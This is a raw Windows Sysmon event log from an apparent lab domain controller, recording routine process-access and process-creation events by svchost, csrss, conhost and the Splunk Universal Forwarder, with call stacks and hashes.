13:55:54.152{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007264Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.152{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007263Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.152{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007262Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.152{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007261Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.152{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007260Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.152{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007259Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.152{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85EA-5FCF-2B01-000000009101}4248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007258Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.152{10ACEC4A-85E9-5FCF-1B01-000000009101}18404240C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85EA-5FCF-2B01-000000009101}4248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007257Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.165{10ACEC4A-85EA-5FCF-2B01-000000009101}4248C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007256Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.136{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007255Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.105{10ACEC4A-85E9-5FCF-2A01-000000009101}49444412C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007446Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EB-5FCF-3801-000000009101}4120C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007445Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007444Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007443Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007442Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007441Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007440Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007439Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007438Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007437Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85EB-5FCF-3801-000000009101}4120C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007436Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007435Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-85EB-5FCF-3701-000000009101}5048888C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-85EB-5FCF-3801-000000009101}4120C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007434Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.939{10ACEC4A-85EB-5FCF-3801-000000009101}4120C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-85EB-5FCF-3701-000000009101}5048C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 10341000x80000000000000007433Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EB-5FCF-3701-000000009101}5048C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007432Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007431Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007430Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 